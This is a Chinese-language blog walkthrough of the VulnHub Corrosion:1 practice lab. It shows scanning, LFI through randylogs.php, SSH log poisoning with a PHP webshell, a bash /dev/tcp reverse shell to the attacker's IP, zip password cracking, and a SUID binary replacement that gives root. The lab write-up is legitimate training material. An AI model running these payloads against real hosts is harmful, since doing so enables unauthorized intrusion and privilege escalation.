CORROSION: 1

于 2024-02-19 14:48:30 发布
阅读量320 收藏 3
点赞数 10
分类专栏: vulnhub靶场 文章标签: vulnhub靶场 网络空间安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34942239/article/details/136167426
版权

本机

192.168.223.128

目标机

192.168.223.148

主机发现

nmap -sP 192.168.223.0/24

端口扫描

​nmap -sV -p- -A 192.168.223.148

开启了22 80 端口

看web,是个apache默认界面

扫目录

gobuster dir -u http://192.168.223.148 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

看tasks

# Tasks that need to be completed

1. Change permissions for auth log  #更改身份验证日志的权限
2. Change port 22 -> 7672          #更改端口22->7672
3. Set up phpMyAdmin               #设置phpMyAdmin

没什么用,看blog-post

尝试分离文件,无果

继续目录扫描

gobuster dir -u http://192.168.223.148/blog-post -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

archives下有一个php文件

uploads跟blog-post界面一样

看php文件randylogs.php

能打开但不显示内容,测试发现可以LFI,参数为file

任务1Change permissions for auth log 

先找到auth.log  /var/log/auth.log

发现包含ssh日志,用ssh写入一句话木马

ssh -l "<?php system($_GET['x']);?>" 192.168.223.149

反弹shell

http://192.168.223.148/blog-post/archives/randylogs.php?file=/var/log/auth.log&x=echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%200%3E%261%22%20|%20bash

home下有个randy,想进去发现权限不够

尝试一些提权方法,无果

翻到了一个用户备份文件,可能包含randy的密码

unzip需要密码,下载下来爆破一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip

压缩包密码是!randybaby

得到一个密码randylovesgoldfish1998,是randy的密码

sudo -l发现有个easysysinfo文件有root权限

看一下py文件

#!/usr/bin/python3.9

import os

command1 = "/usr/bin/date"
command2 = "/usr/bin/cat /etc/hosts"
command3 = "/usr/bin/uname -a"


def output():
        print("Today is: ")
        os.system(command1)

        print("\n")

        print("Hosts File: ")
        os.system(command2)

        print("\n")

        print("Kernal Version: ")
        os.system(command3)

output()

easyinfo有suid权限,那么可以重新编译一个easysysinfo文件来替代原来的文件

#include <unistd.h>
#include <stdlib.h>

void main()
{
	setuid(0);   #用户ID为root
	setgid(0);   #组ID为root
	system("bash -i");  #获取shell
}


gcc easysysinfo.c -o easysysinfo

成功提权root,拿到flag

总结:1.ssh一句话木马污染autho.log

           2./var/backups读取用户备份文件

           3.压缩包爆破拿到密码

           4.编译c文件替代同名root权限文件

tao0845
关注
专栏目录
VulnHub靶场-Corrosion:1
hxync的博客
08-14 686
靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试一下: 发现确实存在文件包含,上传一句话木马: 命令执行成功: 反弹shell 先监听端口 url编码: 成功拿到shell 在/var/ba
corrosion:Eclipse Corrosion-Eclipse IDE中的Rust版本
05-04
Corrosion是Eclipse IDE的Rust开发插件,通过与Rust Analyzer语言服务器,CargoRunner和gdb调试器集成,提供了丰富的版本体验。 下载/安装 腐蚀 从成熟的Eclipse IDE进行Rust开发。 或者 在您的计算机上正确安装了...
vulnhub靶场CORROSION: 1
kukudeshuo的博客
01-10 1884
vulnhub靶场CORROSION: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 攻击机:kali(192.168.109.128) 靶机:CORROSION: 1(192.168.109.192) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:获取目标靶机root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192
vulnhub靶场——CORROSION:1
Czheisenberg的博客
02-16 2091
准备 攻击机:kali 靶机: CORROSION: 1 NAT 192.168.91.0 网段 下载连接: https://www.vulnhub.com/entry/corrosion-1,730/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.188 端口扫描 如图所示只开放了 22,80 两个端口。 HTTP http://192.168.91.188/ 目录扫描 挨个访问上面的路径:
vulnhub-Corrosion: 1
qq_43006864的博客
05-10 695
Corrosion: 1 ~ VulnHub 靶机: 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: nmap 192.168.1.1/24 由于这个靶机没有给出ip地址,这里需要自己扫描,这里根据他开放的22和80端口判断,192.168.1.102这台机是靶机。因为我这就这么几台电脑。 继续扫描 nmap -sS -s..
vulnhub刷题记录(CORROSION: 1)
ailx10
08-28 322
英文名称:CORROSION: 1中文名称:腐蚀:1发布日期:2021 年 7 月 31 日难度:容易描述:一个适合初学者的简单盒子,但不太容易。祝你好运。提示:枚举属性。下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 1、开机(用户名 randy)开机2、主机发现(192.168.199.118)主机发现3、端口扫描(22、80)端口扫描...
看完这篇 教你玩转渗透测试靶机vulnhubCorrosion:1
Aluxian_的博客
06-24 1950
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。Easy。
【渗透测试】Vulnhub Corrosion : 1
qq_51143406的博客
01-17 990
chmod +s /bin/bash 是设置bash的setuid位,让用户在运行bash的过程中暂时获得拥有者的权限,运行easysysinfo时调用的是我们写的cat,就会让bash的setuid被设置,随后就可以以特权身份运行bash。看了其他师傅们的文章,这里是有一个文件包含漏洞,但是我们不知道传什么参,因此我们fuzz以下,参数值就设置为。,查看一下,发现easysysinfo会调用cat,而且没有使用绝对路径,那么我们就可以重写一个。开放了22和80端口,访问80端口,可以正常访问。
vulnhub吧唧——CORROSION: 1
xstlikeja的博客
07-30 152
总结:学会了一些新的命令,dirsearch可以-w指定参数列表还可以扫二级目录,ffuf可以进行模糊测试可以扫目录可以爆破变量名,还有日志包含,利用ssh写入一句话木马执行命令,nc反弹shell,/usr/share/wordlists/是kali自带的密码目录,zip2john爆破压缩包密码,fcrackzip爆破zip文件密码,滥用环境变量用cat提权,还有gcc编译成可执行文件覆盖对应的文件以至提权,总的来说学到的小知识点非常的多,很开心能学到这些东西,多多积累啦。请出我们的老朋友——nc。
Vulnhub 靶场】【Corrosion: 1】【简单】【20210731】
惟忆
12-23 1342
靶场介绍:https://www.vulnhub.com/entry/corrosion-1,730/ 靶场下载:https://download.vulnhub.com/corrosion/Corrosion.ova 靶场难度:简单 发布日期:2021年07月31日 文件大小:7.8 GB 靶场作者:Proxy Programmer 靶场系列:Corrosion 打靶耗时:4+ 小时,利用写入日志漏洞 GetShell 的确是很少碰到,Linux 信息收集也花费了一些时间,最后提权用了两种方式。
腐蚀matlab代码-Corrosion:用塔菲尔外推法计算腐蚀速率
05-22
在提供的"Corrosion-master"压缩包中,可能包含了实现这些步骤的Matlab源代码,如数据读取、预处理、图形绘制、曲线拟合和结果计算等函数。通过阅读和理解这些代码,可以学习到如何在实际项目中应用塔菲尔外推法进行...
Corrosion 是 Eclipse IDE 的 Rust 开发插件
10-05
**1. 插件概述** Corrosion 是一个专为 Eclipse 设计的 Rust 开发插件,它的目标是为 Rust 程序员提供与 IDE 集成的开发环境,以提高开发效率。Corrosion 通过整合 Rust Analyzer 语言服务器、Cargo runner 和 gdb ...
Corrosion current Tafel - Matlab (1)_腐蚀_corrosion_金属腐蚀_随机大小圆的生成_
09-29
标题中的“Corrosion current Tafel - Matlab (1)”提到了腐蚀电流和Tafel曲线,这在金属腐蚀研究中是非常重要的概念。Tafel曲线是描述电化学腐蚀过程中阴极和阳极反应速率与电位关系的图表,通过分析Tafel曲线,...
重庆对外经贸学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
湖北大学在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
西安培华学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
yolo算法-自动驾驶道路交通锥数据集-110张图像带标签-蓝黄色automatic-v62ff.zip
最新发布
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
欧姆龙plc55个程序,三层提升机,冲床,自动模切机,啤机,灌装机,双翻分拣机,铬化机,螺纹钢生产线,超声波清洗机等等
10-31
三层提升机欧姆龙CQM1H程序.rar 三菱400吨和200号冲床程序.rar 上海产自动模切机飞达部程序.zip 上海狮印全自动啤机程序.rar 两步法吹瓶机.rar 买书的随书样例.rar 井研磨边机.rar 利慧利乐灌装机程序.rar 南京印刷机.zip 双翻分拣机.rar 双边机.rar 台湾产染色机欧姆龙PLC带3只IO扩展控制程序.rar 台湾大拉无板.rar 啤酒厂酒瓶美容机.rar 四川绵阳建丰热磨工段.rar 挡砖磨边机(新1).rar 捷豹空压机控制程序.rar 料位显示.rar 抛光研磨.rar 成型磨床控制程序(附注释)欧姆龙CPM1A.rar 模拟量试验.rar 欧姆龙CJ1M铬化机程序带注释.rar 欧姆龙CP1H例程.rar 欧姆龙CPM1A的PLC.rar 欧姆龙CPM2AH PLC和欧姆龙NTZ触摸屏编写的超声波清洗机程序..rar 欧姆龙CPM2AH Host Link通讯程序(发布源码).rar 欧姆龙CPM2A 螺纹钢生产线的PLC程序.rar 欧姆龙PLC与富士变频器Modbus通讯.rar 欧姆龙PLC主从HOSTLINK通讯实例程序等等.
代码解释:morphologyEx(img_threshold, img_threshold, MORPH_CLOSE, element); if (debug) { opencv_imgcodecs.imwrite("D:\\PlateLocate"+ "Corrosion expansion"+".jpg", img_threshold); System.out.println("腐蚀膨胀"+"D:\\PlateLocate"+ "Corrosion expansion"+".jpg"); }
06-10
这段代码使用了OpenCV中的形态学操作函数`morphologyEx()`,对二值化图像`img_threshold`进行闭运算(即先进行腐蚀再进行膨胀),使用的结构元素是`element`。该操作可以去除二值化图像中的小孔和小洞,使车牌字符...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

tao0845

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值